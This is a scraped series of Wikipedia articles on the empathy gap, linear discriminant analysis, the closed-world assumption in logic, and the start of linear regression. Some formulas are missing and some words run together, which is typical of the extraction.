Anempathy gap, sometimes referred to as anempathy bias, is a breakdown or reduction inempathy(the ability to recognize, understand, and share another's thoughts and feelings) where it might otherwise be expected to occur. Empathy gaps may occur due to a failure in the process of empathizing[1]or as a consequence of stable personality characteristics,[2][3][4]and may reflect either a lack of ability or motivation to empathize.
Empathy gaps can be interpersonal (toward others) or intrapersonal (toward the self, e.g. when predicting one's own future preferences). A great deal of social psychological research has focused on intergroup empathy gaps, their underlying psychological and neural mechanisms, and their implications for downstream behavior (e.g. prejudice toward outgroup members).
Failures in cognitive empathy (also referred to asperspective-taking) may sometimes result from a lack of ability. For example, young children often engage in failures of perspective-taking (e.g., on false belief tasks) due to underdeveloped social cognitive abilities.[5]Neurodivergent individualsoftenface difficultiesinferring others' emotional and cognitive states, though thedouble empathy problemproposes that the problem is mutual, occurring as well in non-neurodivergent individuals' struggle to understand and relate to neurodivergent people.[6]Failures in cognitive empathy may also result from cognitive biases that impair one's ability to understand another's perspective (for example, see the related concept ofnaive realism.)[7]
One's ability to perspective-take may be limited by one's current emotional state. For example, behavioral economics research has described a number of failures in empathy that occur due to emotional influences on perspective-taking when people make social predictions. People may either fail to accurately predict one's own preferences and decisions (intrapersonal empathy gaps), or to consider how others' preferences might differ from one's own (interpersonal empathy gaps).[8]For example, people not owning a certain good underestimate their attachment to that good were they to own it.[9]
In other circumstances, failures in cognitive empathy may occur due to a lack of motivation.[10]For example, people are less likely to take the perspective of outgroup members with whom they disagree.
Affective (i.e. emotional) empathy gaps may describe instances in which an observer and target do not experience similar emotions,[11]or when an observer does not experience anticipated emotional responses toward a target, such as sympathy and compassion.[12]
Certain affective empathy gaps may be driven by a limited ability to share another's emotions. For example,psychopathyis characterized byimpairmentsin emotional empathy.[13]
Individuals may be motivated to avoid empathizing with others' emotions due to the emotional costs of doing so. For example, according to C. D. Batson's model of empathy, empathizing with others may either result in empathic concern (i.e. feelings of warmth and concern for another) or personal distress (i.e. when another's distress causes distress for the self).[14]A trait-level tendency to experience personal distress (vs. empathic concern) may motivate individuals to avoid situations which would require them to empathize with others, and indeed predicts reduced helping behavior.
Humans are less likely to helpoutgroupmembers in need, as compared to ingroup members.[15]People are also less likely to value outgroup members' lives as highly as those of ingroup members.[16]These effects are indicative of aningroup empathy bias,in which people empathize more with ingroup (vs. outgroup) members.
Intergroup empathy gaps are often affective or cognitive in nature, but also extend to other domains such aspain. For example, a great deal of research has demonstrated that people show reduced responses (e.g. neural activity) when observing outgroup (vs. ingroup) members in pain.[17][18][19][20]These effects may occur for real-world social groups such as members of different races. In one study utilizing aminimal groups paradigm(in which groups are randomly assigned, ostensibly based on an arbitrary distinction), individuals also judged the perceived pain of ingroup members to be more painful than that of outgroup members.[21]
Perhaps the most well-known "counter-empathic" emotion—i.e., an emotion that reflects an empathy gap for the target—isschadenfreude, or the experience of pleasure when observing or learning about another's suffering or misfortune.[22]Schadenfreude frequently occurs in intergroup contexts.[23][24]In fact, the two factors that most strongly predict schadenfreude are identification with one's group and the presence of competition between groups in conflict.[25][26]Competition may be explicit; for example, one study found that soccer fans were less likely to help an injured stranger wearing a rival team shirt than someone wearing an ingroup team shirt.[27]However, schadenfreude may also be directed toward members of groups associated with high-status, competitive stereotypes.[28]These findings correspond with thestereotype content model, which proposes that such groups elicit envy, thereby precipitating schadenfreude.
Stress related to the experience of empathy may causeempathic distress fatigueandoccupational burnout,[29]particularly among those in the medical profession. Expressing empathy is an important component of patient-centered care, and can be expressed through behaviors such as concern, attentiveness, sharing emotions, vulnerability, understanding, dialogue, reflection, and authenticity.[30]However, expressing empathy can be cognitively and emotionally demanding for providers.[31]Physicians who lack proper support may experience depression and burnout, particularly in the face of the extended or frequent experiences of personal distress.
Within the domain of social psychology, "empathy gaps" typically describe breakdowns in empathy toward others (interpersonal empathy gaps). However, research in behavioral economics has also identified a number of intrapersonal empathy gaps (i.e. toward one's self). For example, "hot-cold empathy gaps" describe a breakdown in empathy for one's future self—specifically, a failure to anticipate how one's future affective states will affect one's preferences.[32]Such failures can negatively impactdecision-making, particularly in regards to health outcomes. Hot-cold empathy gaps are related to the psychological concepts ofaffective forecastingandtemporal discounting.
Both affective and cognitive empathy gaps can occur due to a breakdown in the process ofmentalizingothers' states. For example, breakdowns in mentalizing may include but are not limited to:
Neural evidence also supports the key role of mentalizing in supporting empathic responses, particularly in an intergroup context. For example, a meta-analysis of neuroimaging studies of intergroup social cognition found that thinking about ingroup members (in comparison to outgroup members) was more frequently related to brain regions known to underlie mentalizing.[35]
Gender differences in the experience of empathy have been a subject of debate. In particular, scientists have sought to determine whether observedgender differences in empathyare due to variance in ability, motivation, or both between men and women. Research to date raises the possibility that gender norms regarding the experience and expression of empathy may decrease men's willingness to empathize with others, and therefore their tendency to engage in empathy.
A number of studies, primarily utilizing self-report, have found gender differences in men's and women's empathy. A 1977 review of nine studies found women to be more empathic than men on average.[36]A 1983 review found a similar result, although differences in scores were stronger forself-report,as compared to observational, measures.[37]In recent decades, a number of studies utilizing self-reported empathy have shown gender differences in empathy.[38][39][40]According to the results of a nationally representative survey, men reported less willingness to give money or volunteer time to a poverty relief organization as compared to women, a finding mediated by men's lower self-reported feelings of empathic concern toward others.[41]
However, more recent work has found little evidence that gender differences in self-reported empathy are related to neurophysiological measures (hemodynamic responsesand pupil dilation).[42]This finding raises the possibility that self-reported empathy may not be driven by biological differences in responses, but rather gender differences in willingness to report empathy. Specifically, women may be more likely to report experiencing empathy because it is more gender-normative for women than men.[43]In support of this idea, a study found that manipulating the perceived gender normativity of empathy eliminated gender differences in men and women's self-reported empathy. Specifically, assigning male and female participants to read a narrative describing fictitious neurological research evidence which claimed that males score higher on measures of empathy eliminated the gender gap in self-reported empathy.[44]
Psychological research has identified a number of trait differences associated with reduced empathic responses, including but not limited to:
According to theperception–action-modelof empathy,[51]perception–action-coupling(i.e., the vicarious activation of the neural system for action during the perception of action) allows humans to understand others' actions, intentions, and emotions. According to this theory, when a "subject" individual observes an "object" individual, the object's physical movements and facial expressions activate corresponding neural mechanisms in the subject.[52]That is, by neurally simulating the object's observed states, the subject also experiences these states, the basis of empathy.
Themirror neuron system[53]has been proposed as a neural mechanism supportingperception-action couplingandempathy, although such claims remain a subject of scientific debate. Although the exact (if any) role of mirror neurons in supporting empathy is unclear, evidence suggests that neural simulation (i.e., recreating neural states associated with a process observed in another) may generally support a variety of psychological processes in humans, including disgust,[54]pain,[55]touch,[56]and facial expressions.[57]
Reduced neural simulation of responses to suffering may account in part for observed empathy gaps, particularly in an intergroup context. This possibility is supported by research demonstrating that people show reduced neural activity when they witness ethnic outgroup (vs. ingroup) members in physical or emotional pain.[17][18]In one study, Chinese and Causian participants viewed videos of Chinese and Causasian targets, who displayed neutral facial expressions as they received either painful or non-painful stimulation to their cheeks.[17]Witnessing racial ingroup faces receive painful stimulation increased activity in the dorsal anterior cingulate cortex and anterior insula (two regions which generally activate during the experience of pain.) However, these responses were diminished toward outgroup members in pain. These results replicated among White-Italian and Black-African participants.[19]Additionally, EEG work has shown reduced neural simulation of movement (in primary motor cortex) for outgroup members, compared to in-group members.[20]This effect was magnified by prejudice and toward disliked groups (i.e. South-Asians, Blacks, and East Asians).
A great deal of social neuroscience research has been conducted to investigate the social functions of the hormoneoxytocin,[58]including its role in empathy. Generally speaking, oxytocin is associated with cooperation between individuals (in both humans and non-human animals). However, these effects interact with group membership in intergroup settings: oxytocin is associated with increased bonding with ingroup, but not outgroup, members, and may thereby contribute to ingroup favoritism and intergroup empathy bias.[59]However, in one study of Israelis and Palestinians, intranasal oxytocin administration improved opposing partisans' empathy for outgroup members by increasing the salience of their pain.[60]
In addition to temporary changes in oxytocin levels, the influence of oxytocin on empathic responses may also be influenced by an oxytocin receptor gene polymorphism,[61]such that certain individuals may differ in the extent to which oxytocin promotes ingroup favoritism.
A number of studies have been conducted to identify the neural regions implicated in intergroup empathy biases.[62][33][63]This work has highlighted candidate regions supporting psychological processes such as mentalizing for ingroup members, deindividuation of outgroup members, and the pleasure associated with the experience of schadenfreude.
A meta-analysis of 50 fMRI studies of intergroup social cognition found more consistent activation indorsomedial prefrontal cortex(dmPFC) during ingroup (vs. outgroup) social cognition.[35]dmPFC has previously been linked to the ability to infer others' mental states,[64][65][66]which suggests that individuals may be more likely to engage in mentalizing for ingroup (as compared to outgroup) members. dmPFC activity has also been linked to prosocial behavior;[67][68]thus, dmPFC's association with cognition about ingroup members suggests a potential neurocognitive mechanism underlying ingroup favoritism.
Activation patterns in theanterior insula(AI) have been observed when thinking about both ingroup and outgroup members. For example, greater activity in the anterior insula has been observed when participants view ingroup members on a sports team receiving pain, compared to outgroup members receiving pain.[69][70]In contrast, the meta-analysis referenced previously[35]found that anterior insula activation was more reliably related to social cognition about outgroup members.
These seemingly divergent results may be due in part to functional differences between anatomic subregions of the anterior insula. Meta-analyses have identified two distinct subregions of the anterior insula: ventral AI, which is linked to emotional and visceral experiences (e.g. subjective arousal); and dorsal AI, which has been associated with exogenous attention processes such as attention orientation, salience detection, and task performance monitoring.[71][72][73]Therefore, anterior insula activation may occur more often when thinking about outgroup members because doing is more attentionally demanding than thinking about ingroup members.[35]
Lateralizationof function within the anterior insula may also help account for divergent results, due to differences in connectivity between left and right AI. The right anterior insula has greater connectivity with regions supporting attentional orientation and arousal (e.g. postcentral gyrus and supramarginal gyrus), compared to the left anterior insula, which has greater connectivity with regions involved in perspective-taking and cognitive motor control (e.g. dmPFC and superior frontal gyrus).[74]The previously referenced meta-analysis found right lateralization of anterior insula for outgroup compared to ingroup processing.[35]These findings raise the possibility that when thinking about outgroup members, individuals may use their attention to focus on targets' salient outgroup status, as opposed to thinking about the outgroup member as an individual. In contrast, the meta-analysis found left lateralization of anterior insula activity for thinking about ingroup compared to outgroup members. This finding suggests that left anterior insula may help support perspective-taking and mentalizing about ingroup members, and thinking about them in an individuated way. However, these possibilities are speculative and lateralization may vary due to characteristics such as age, gender, and other individual differences, which should be accounted for in future research.[75][74]
A number of fMRI studies have attempted to identify the neural activation patterns underlying the experience of intergroup schadenfreude, particularly toward outgroup members in pain. These studies have found increased activation in theventral striatum, a region related to reward processing and pleasure.[76]
Breakdowns in empathy may reduce helping behavior,[77][78]a phenomenon illustrated by theidentifiable victim effect. Specifically, humans are less likely to assist others who are not identifiable on an individual level.[79]A related concept is psychological distance—that is, we are less likely to help those who feel more psychologically distant from us.[80]
Reduced empathy for outgroup members is associated with a reduction in willingness to entertain another's points of view, the likelihood of ignoring a customer's complaints, the likelihood of helping others during a natural disaster, and the chance that one opposes social programs designed to benefit disadvantaged individuals.[81][71]
Empathy gaps may contribute to prejudicial attitudes and behavior. However, training people in perspective-taking, for example by providing instructions about how to take an outgroup member's perspective, has been shown to increase intergroup helping and the recognition of group disparities.[82]Perspective-taking interventions are more likely to be effective when a multicultural approach is used (i.e., an approach that appreciates intergroup differences), as opposed to a "colorblind" approach (e.g. an approach that attempts to emphasize a shared group identity).[82][83][84]
|
https://en.wikipedia.org/wiki/Empathy_gap
|
Linear discriminant analysis(LDA),normal discriminant analysis(NDA),canonical variates analysis(CVA), ordiscriminant function analysisis a generalization ofFisher's linear discriminant, a method used instatisticsand other fields, to find alinear combinationof features that characterizes or separates two or more classes of objects or events. The resulting combination may be used as alinear classifier, or, more commonly, fordimensionality reductionbefore laterclassification.
LDA is closely related toanalysis of variance(ANOVA) andregression analysis, which also attempt to express onedependent variableas a linear combination of other features or measurements.[2][3]However, ANOVA usescategoricalindependent variablesand acontinuousdependent variable, whereas discriminant analysis has continuousindependent variablesand a categorical dependent variable (i.e.the class label).[4]Logistic regressionandprobit regressionare more similar to LDA than ANOVA is, as they also explain a categorical variable by the values of continuous independent variables. These other methods are preferable in applications where it is not reasonable to assume that the independent variables are normally distributed, which is a fundamental assumption of the LDA method.
LDA is also closely related toprincipal component analysis(PCA) andfactor analysisin that they both look for linear combinations of variables which best explain the data.[5]LDA explicitly attempts to model the difference between the classes of data. PCA, in contrast, does not take into account any difference in class, and factor analysis builds the feature combinations based on differences rather than similarities. Discriminant analysis is also different from factor analysis in that it is not an interdependence technique: a distinction between independent variables and dependent variables (also called criterion variables) must be made.
LDA works when the measurements made on independent variables for each observation are continuous quantities. When dealing with categorical independent variables, the equivalent technique is discriminant correspondence analysis.[6][7]
Discriminant analysis is used when groups are known a priori (unlike incluster analysis). Each case must have a score on one or more quantitative predictor measures, and a score on a group measure.[8]In simple terms, discriminant function analysis is classification - the act of distributing things into groups, classes or categories of the same type.
The originaldichotomousdiscriminant analysis was developed by SirRonald Fisherin 1936.[9]It is different from anANOVAorMANOVA, which is used to predict one (ANOVA) or multiple (MANOVA) continuous dependent variables by one or more independent categorical variables. Discriminant function analysis is useful in determining whether a set of variables is effective in predicting category membership.[10]
Consider a set of observationsx→{\displaystyle {\vec {x}}}(also called features, attributes, variables or measurements) for each sample of an object or event with known classy{\displaystyle y}. This set of samples is called thetraining setin asupervised learningcontext. The classification problem is then to find a good predictor for the classy{\displaystyle y}of any sample of the same distribution (not necessarily from the training set) given only an observationx→{\displaystyle {\vec {x}}}.[11]: 338
LDA approaches the problem by assuming that the conditionalprobability density functionsp(x→|y=0){\displaystyle p({\vec {x}}|y=0)}andp(x→|y=1){\displaystyle p({\vec {x}}|y=1)}are boththe normal distributionwith mean andcovarianceparameters(μ→0,Σ0){\displaystyle \left({\vec {\mu }}_{0},\Sigma _{0}\right)}and(μ→1,Σ1){\displaystyle \left({\vec {\mu }}_{1},\Sigma _{1}\right)}, respectively. Under this assumption, theBayes-optimal solutionis to predict points as being from the second class if the log of the likelihood ratios is bigger than some threshold T, so that:
Without any further assumptions, the resulting classifier is referred to asquadratic discriminant analysis(QDA).
LDA instead makes the additional simplifyinghomoscedasticityassumption (i.e.that the class covariances are identical, soΣ0=Σ1=Σ{\displaystyle \Sigma _{0}=\Sigma _{1}=\Sigma }) and that the covariances have full rank.
In this case, several terms cancel:
and the above decision criterion
becomes a threshold on thedot product
for some threshold constantc, where
This means that the criterion of an inputx→{\displaystyle {\vec {x}}}being in a classy{\displaystyle y}is purely a function of this linear combination of the known observations.
It is often useful to see this conclusion in geometrical terms: the criterion of an inputx→{\displaystyle {\vec {x}}}being in a classy{\displaystyle y}is purely a function of projection of multidimensional-space pointx→{\displaystyle {\vec {x}}}onto vectorw→{\displaystyle {\vec {w}}}(thus, we only consider its direction). In other words, the observation belongs toy{\displaystyle y}if correspondingx→{\displaystyle {\vec {x}}}is located on a certain side of a hyperplane perpendicular tow→{\displaystyle {\vec {w}}}. The location of the plane is defined by the thresholdc{\displaystyle c}.
The assumptions of discriminant analysis are the same as those for MANOVA. The analysis is quite sensitive to outliers and the size of the smallest group must be larger than the number of predictor variables.[8]
It has been suggested that discriminant analysis is relatively robust to slight violations of these assumptions,[12]and it has also been shown that discriminant analysis may still be reliable when using dichotomous variables (where multivariate normality is often violated).[13]
Discriminant analysis works by creating one or more linear combinations of predictors, creating a newlatent variablefor each function. These functions are called discriminant functions. The number of functions possible is eitherNg−1{\displaystyle N_{g}-1}whereNg{\displaystyle N_{g}}= number of groups, orp{\displaystyle p}(the number of predictors), whichever is smaller. The first function created maximizes the differences between groups on that function. The second function maximizes differences on that function, but also must not be correlated with the previous function. This continues with subsequent functions with the requirement that the new function not be correlated with any of the previous functions.
Given groupj{\displaystyle j}, withRj{\displaystyle \mathbb {R} _{j}}sets of sample space, there is a discriminant rule such that ifx∈Rj{\displaystyle x\in \mathbb {R} _{j}}, thenx∈j{\displaystyle x\in j}. Discriminant analysis then, finds “good” regions ofRj{\displaystyle \mathbb {R} _{j}}to minimize classification error, therefore leading to a high percent correct classified in the classification table.[14]
Each function is given a discriminant score[clarification needed]to determine how well it predicts group placement.
Aneigenvaluein discriminant analysis is the characteristic root of each function.[clarification needed]It is an indication of how well that function differentiates the groups, where the larger the eigenvalue, the better the function differentiates.[8]This however, should be interpreted with caution, as eigenvalues have no upper limit.[10][8]The eigenvalue can be viewed as a ratio ofSSbetweenandSSwithinas in ANOVA when the dependent variable is the discriminant function, and the groups are the levels of theIV[clarification needed].[10]This means that the largest eigenvalue is associated with the first function, the second largest with the second, etc..
Some suggest the use of eigenvalues aseffect sizemeasures, however, this is generally not supported.[10]Instead, thecanonical correlationis the preferred measure of effect size. It is similar to the eigenvalue, but is the square root of the ratio ofSSbetweenandSStotal. It is the correlation between groups and the function.[10]Another popular measure of effect size is the percent of variance[clarification needed]for each function. This is calculated by: (λx/Σλi) X 100 whereλxis the eigenvalue for the function and Σλiis the sum of all eigenvalues. This tells us how strong the prediction is for that particular function compared to the others.[10]Percent correctly classified can also be analyzed as an effect size. The kappa value can describe this while correcting for chance agreement.[10]Kappa normalizes across all categorizes rather than biased by a significantly good or poorly performing classes.[clarification needed][17]
Canonical discriminant analysis (CDA) finds axes (k− 1canonical coordinates,kbeing the number of classes) that best separate the categories. These linear functions are uncorrelated and define, in effect, an optimalk− 1 space through then-dimensional cloud of data that best separates (the projections in that space of) thekgroups. See “Multiclass LDA” for details below.
Because LDA uses canonical variates, it was initially often referred as the "method of canonical variates"[18]or canonical variates analysis (CVA).[19]
The termsFisher's linear discriminantandLDAare often used interchangeably, althoughFisher'soriginal article[2]actually describes a slightly different discriminant, which does not make some of the assumptions of LDA such asnormally distributedclasses or equal classcovariances.
Suppose two classes of observations havemeansμ→0,μ→1{\displaystyle {\vec {\mu }}_{0},{\vec {\mu }}_{1}}and covariancesΣ0,Σ1{\displaystyle \Sigma _{0},\Sigma _{1}}. Then the linear combination of featuresw→Tx→{\displaystyle {\vec {w}}^{\mathrm {T} }{\vec {x}}}will havemeansw→Tμ→i{\displaystyle {\vec {w}}^{\mathrm {T} }{\vec {\mu }}_{i}}andvariancesw→TΣiw→{\displaystyle {\vec {w}}^{\mathrm {T} }\Sigma _{i}{\vec {w}}}fori=0,1{\displaystyle i=0,1}. Fisher defined the separation between these twodistributionsto be the ratio of the variance between the classes to the variance within the classes:
This measure is, in some sense, a measure of thesignal-to-noise ratiofor the class labelling. It can be shown that the maximum separation occurs when
When the assumptions of LDA are satisfied, the above equation is equivalent to LDA.
Be sure to note that the vectorw→{\displaystyle {\vec {w}}}is thenormalto the discriminanthyperplane. As an example, in a two dimensional problem, the line that best divides the two groups is perpendicular tow→{\displaystyle {\vec {w}}}.
Generally, the data points to be discriminated are projected ontow→{\displaystyle {\vec {w}}}; then the threshold that best separates the data is chosen from analysis of the one-dimensional distribution. There is no general rule for the threshold. However, if projections of points from both classes exhibit approximately the same distributions, a good choice would be the hyperplane between projections of the two means,w→⋅μ→0{\displaystyle {\vec {w}}\cdot {\vec {\mu }}_{0}}andw→⋅μ→1{\displaystyle {\vec {w}}\cdot {\vec {\mu }}_{1}}. In this case the parameter c in threshold conditionw→⋅x→>c{\displaystyle {\vec {w}}\cdot {\vec {x}}>c}can be found explicitly:
Otsu's methodis related to Fisher's linear discriminant, and was created to binarize the histogram of pixels in a grayscale image by optimally picking the black/white threshold that minimizes intra-class variance and maximizes inter-class variance within/between grayscales assigned to black and white pixel classes.
In the case where there are more than two classes, the analysis used in the derivation of the Fisher discriminant can be extended to find asubspacewhich appears to contain all of the class variability.[20]This generalization is due toC. R. Rao.[21]Suppose that each of C classes has a meanμi{\displaystyle \mu _{i}}and the same covarianceΣ{\displaystyle \Sigma }. Then the scatter between class variability may be defined by the sample covariance of the class means
whereμ{\displaystyle \mu }is the mean of the class means. The class separation in a directionw→{\displaystyle {\vec {w}}}in this case will be given by
This means that whenw→{\displaystyle {\vec {w}}}is aneigenvectorofΣ−1Σb{\displaystyle \Sigma ^{-1}\Sigma _{b}}the separation will be equal to the correspondingeigenvalue.
IfΣ−1Σb{\displaystyle \Sigma ^{-1}\Sigma _{b}}is diagonalizable, the variability between features will be contained in the subspace spanned by the eigenvectors corresponding to theC− 1 largest eigenvalues (sinceΣb{\displaystyle \Sigma _{b}}is of rankC− 1 at most). These eigenvectors are primarily used in feature reduction, as in PCA. The eigenvectors corresponding to the smaller eigenvalues will tend to be very sensitive to the exact choice of training data, and it is often necessary to use regularisation as described in the next section.
If classification is required, instead ofdimension reduction, there are a number of alternative techniques available. For instance, the classes may be partitioned, and a standard Fisher discriminant or LDA used to classify each partition. A common example of this is "one against the rest" where the points from one class are put in one group, and everything else in the other, and then LDA applied. This will result in C classifiers, whose results are combined. Another common
method is pairwise classification, where a new classifier is created for each pair of classes (givingC(C− 1)/2 classifiers in total), with the individual classifiers combined to produce a final classification.
The typical implementation of the LDA technique requires that all the samples are available in advance. However, there are situations where the entire data set is not available and the input data are observed as a stream. In this case, it is desirable for the LDA feature extraction to have the ability to update the computed LDA features by observing the new samples without running the algorithm on the whole data set. For example, in many real-time applications such as mobile robotics or on-line face recognition, it is important to update the extracted LDA features as soon as new observations are available. An LDA feature extraction technique that can update the LDA features by simply observing new samples is anincremental LDA algorithm, and this idea has been extensively studied over the last two decades.[22]Chatterjee and Roychowdhury proposed an incremental self-organized LDA algorithm for updating the LDA features.[23]In other work, Demir and Ozmehmet proposed online local learning algorithms for updating LDA features incrementally using error-correcting and the Hebbian learning rules.[24]Later, Aliyari et al. derived fast incremental algorithms to update the LDA features by observing the new samples.[22]
In practice, the class means and covariances are not known. They can, however, be estimated from the training set. Either themaximum likelihood estimateor themaximum a posterioriestimate may be used in place of the exact value in the above equations. Although the estimates of the covariance may be considered optimal in some sense, this does not mean that the resulting discriminant obtained by substituting these values is optimal in any sense, even if the assumption of normally distributed classes is correct.
Another complication in applying LDA and Fisher's discriminant to real data occurs when the number of measurements of each sample (i.e., the dimensionality of each data vector) exceeds the number of samples in each class.[5]In this case, the covariance estimates do not have full rank, and so cannot be inverted. There are a number of ways to deal with this. One is to use apseudo inverseinstead of the usual matrix inverse in the above formulae. However, better numeric stability may be achieved by first projecting the problem onto the subspace spanned byΣb{\displaystyle \Sigma _{b}}.[25]Another strategy to deal with small sample size is to use ashrinkage estimatorof the covariance matrix, which
can be expressed mathematically as
whereI{\displaystyle I}is the identity matrix, andλ{\displaystyle \lambda }is theshrinkage intensityorregularisation parameter.
This leads to the framework of regularized discriminant analysis[26]or shrinkage discriminant analysis.[27]
Also, in many practical cases linear discriminants are not suitable. LDA and Fisher's discriminant can be extended for use in non-linear classification via thekernel trick. Here, the original observations are effectively mapped into a higher dimensional non-linear space. Linear classification in this non-linear space is then equivalent to non-linear classification in the original space. The most commonly used example of this is thekernel Fisher discriminant.
LDA can be generalized tomultiple discriminant analysis, wherecbecomes acategorical variablewithNpossible states, instead of only two. Analogously, if the class-conditional densitiesp(x→∣c=i){\displaystyle p({\vec {x}}\mid c=i)}are normal with shared covariances, thesufficient statisticforP(c∣x→){\displaystyle P(c\mid {\vec {x}})}are the values ofNprojections, which are thesubspacespanned by theNmeans,affine projectedby the inverse covariance matrix. These projections can be found by solving ageneralized eigenvalue problem, where the numerator is the covariance matrix formed by treating the means as the samples, and the denominator is the shared covariance matrix. See “Multiclass LDA” above for details.
In addition to the examples given below, LDA is applied inpositioningandproduct management.
Inbankruptcy predictionbased on accounting ratios and other financial variables, linear discriminant analysis was the first statistical method applied to systematically explain which firms entered bankruptcy vs. survived. Despite limitations including known nonconformance of accounting ratios to the normal distribution assumptions of LDA,Edward Altman's1968 model[28]is still a leading model in practical applications.[29][30][31]
In computerisedface recognition, each face is represented by a large number of pixel values. Linear discriminant analysis is primarily used here to reduce the number of features to a more manageable number before classification. Each of the new dimensions is a linear combination of pixel values, which form a template. The linear combinations obtained using Fisher's linear discriminant are calledFisher faces, while those obtained using the relatedprincipal component analysisare calledeigenfaces.
Inmarketing, discriminant analysis was once often used to determine the factors which distinguish different types of customers and/or products on the basis of surveys or other forms of collected data.Logistic regressionor other methods are now more commonly used. The use of discriminant analysis in marketing can be described by the following steps:
The main application of discriminant analysis in medicine is the assessment of severity state of a patient and prognosis of disease outcome. For example, during retrospective analysis, patients are divided into groups according to severity of disease – mild, moderate, and severe form. Then results of clinical and laboratory analyses are studied to reveal statistically different variables in these groups. Using these variables, discriminant functions are built to classify disease severity in future patients. Additionally, Linear Discriminant Analysis (LDA) can help select more discriminative samples for data augmentation, improving classification performance.[32]
In biology, similar principles are used in order to classify and define groups of different biological objects, for example, to define phage types of Salmonella enteritidis based on Fourier transform infrared spectra,[33]to detect animal source ofEscherichia colistudying its virulence factors[34]etc.
This method can be used toseparate the alteration zones[clarification needed]. For example, when different data from various zones are available, discriminant analysis can find the pattern within the data and classify it effectively.[35]
Discriminant function analysis is very similar tologistic regression, and both can be used to answer the same research questions.[10]Logistic regression does not have as many assumptions and restrictions as discriminant analysis. However, when discriminant analysis’ assumptions are met, it is more powerful than logistic regression.[36]Unlike logistic regression, discriminant analysis can be used with small sample sizes. It has been shown that when sample sizes are equal, and homogeneity of variance/covariance holds, discriminant analysis is more accurate.[8]Despite all these advantages, logistic regression has none-the-less become the common choice, since the assumptions of discriminant analysis are rarely met.[9][8]
Geometric anomalies in higher dimensions lead to the well-knowncurse of dimensionality. Nevertheless, proper utilization ofconcentration of measurephenomena can make computation easier.[37]An important case of theseblessing of dimensionalityphenomena was highlighted by Donoho and Tanner: if a sample is essentially high-dimensional then each point can be separated from the rest of the sample by linear inequality, with high probability, even for exponentially large samples.[38]These linear inequalities can be selected in the standard (Fisher's) form of the linear discriminant for a rich family of probability distribution.[39]In particular, such theorems are proven forlog-concavedistributions includingmultidimensional normal distribution(the proof is based on the concentration inequalities for log-concave measures[40]) and for product measures on a multidimensional cube (this is proven usingTalagrand's concentration inequalityfor product probability spaces). Data separability by classical linear discriminants simplifies the problem of error correction forartificial intelligencesystems in high dimension.[41]
|
https://en.wikipedia.org/wiki/Discriminant_function
|
Theclosed-world assumption(CWA), in aformal system of logicused forknowledge representation, is the presumption that a statement that is true is also known to be true. Therefore, conversely, what is not currently known to be true, is false. The same name also refers to alogicalformalization of this assumption byRaymond Reiter.[1]The opposite of the closed-world assumption is theopen-world assumption(OWA), stating that lack of knowledge does not imply falsity. Decisions on CWA vs. OWA determine the understanding of the actual semantics of a conceptual expression with the same notations of concepts. A successfulformalization of natural language semanticsusually cannot avoid an explicit revelation of whether the implicit logical backgrounds are based on CWA or OWA.
Negation as failureis related to the closed-world assumption, as it amounts to believing false every predicate that cannot be proved to be true.
In the context ofknowledge management, the closed-world assumption is used in at least two situations: (1) when the knowledge base is known to be complete (e.g., a corporate database containing records for every employee), and (2) when the knowledge base is known to be incomplete but a "best" definite answer must be derived from incomplete information. For example, if adatabasecontains the following table reporting editors who have worked on a given article, a query on the people not having edited the article on Formal Logic is usually expected to return "Sarah Johnson".
In the closed-world assumption, the table is assumed to becomplete(it lists all editor–article relationships), and Sarah Johnson is the only editor who has not edited the article on Formal Logic. In contrast, with the open-world assumption the table is not assumed to contain all editor–article tuples, and the answer to who has not edited the Formal Logic article is unknown. There is an unknown number of editors not listed in the table, and an unknown number of articles edited by Sarah Johnson that are also not listed in the table.
The first formalization of the closed-world assumption informal logicconsists in adding to the knowledge base the negation of the literals that are not currentlyentailedby it. The result of this addition is alwaysconsistentif the knowledge base is inHorn form, but is not guaranteed to be consistent otherwise. For example, the knowledge base
entails neitherEnglish(Fred){\displaystyle English(Fred)}norIrish(Fred){\displaystyle Irish(Fred)}.
Adding the negation of these two literals to the knowledge base leads to
which is inconsistent. In other words, this formalization of the closed-world assumption sometimes turns a consistent knowledge base into an inconsistent one. The closed-world assumption does not introduce an inconsistency on a knowledge baseK{\displaystyle K}exactly when the intersection of allHerbrand modelsofK{\displaystyle K}is also a model ofK{\displaystyle K}; in the propositional case, this condition is equivalent toK{\displaystyle K}having a single minimal model, where a model is minimal if no other model has a subset of variables assigned to true.
Alternative formalizations not suffering from this problem have been proposed. In the following description, the considered knowledge baseK{\displaystyle K}is assumed to be propositional. In all cases, the formalization of the closed-world assumption is based on adding toK{\displaystyle K}the negation of the formulae that are "free for negation" forK{\displaystyle K}, i.e., the formulae that can be assumed to be false. In other words, the closed-world assumption applied to a knowledge baseK{\displaystyle K}generates the knowledge base
The setF{\displaystyle F}of formulae that are free for negation inK{\displaystyle K}can be defined in different ways, leading to different formalizations of the closed-world assumption. The following are the definitions off{\displaystyle f}being free for negation in the various formalizations.
The ECWA and the formalism ofcircumscriptioncoincide on propositional theories.[5][6]The complexity of query answering (checking whether a formula is entailed by another one under the closed-world assumption) is typically in the second level of thepolynomial hierarchyfor general formulae, and ranges fromPtocoNPforHorn formulae. Checking whether the original closed-world assumption introduces an inconsistency requires at most a logarithmic number of calls to anNP oracle; however, the exact complexity of this problem is not currently known.[7]
In situations where it is not possible to assume a closed world for all predicates, yet some of them are known to be closed, thepartial-closed world assumptioncan be used. This regime considers knowledge bases generally to be open, i.e., potentially incomplete, yet allows to use completeness assertions to specify parts of the knowledge base that are closed.[8]
The language of logic programs withstrong negationallows us to postulate the closed-world assumption for some statements and leave the other statements in the realm of the open-world assumption.[9]An intermediate ground between OWA and CWA is provided by thepartial-closed world assumption(PCWA). Under the PCWA, the knowledge base is generally treated under open-world semantics, yet it is possible to assert parts that should be treated under closed-world semantics, via completeness assertions. The PCWA is especially needed for situations where the CWA is not applicable due to an open domain, yet the OWA is too credulous in allowing anything to be possibly true.[10][11]
|
https://en.wikipedia.org/wiki/Closed_world_assumption
|
Instatistics,linear regressionis amodelthat estimates the relationship between ascalarresponse (dependent variable) and one or more explanatory variables (regressororindependent variable). A model with exactly one explanatory variable is asimple linear regression; a model with two or more explanatory variables is amultiple linear regression.[1]This term is distinct frommultivariate linear regression, which predicts multiplecorrelateddependent variables rather than a single dependent variable.[2]
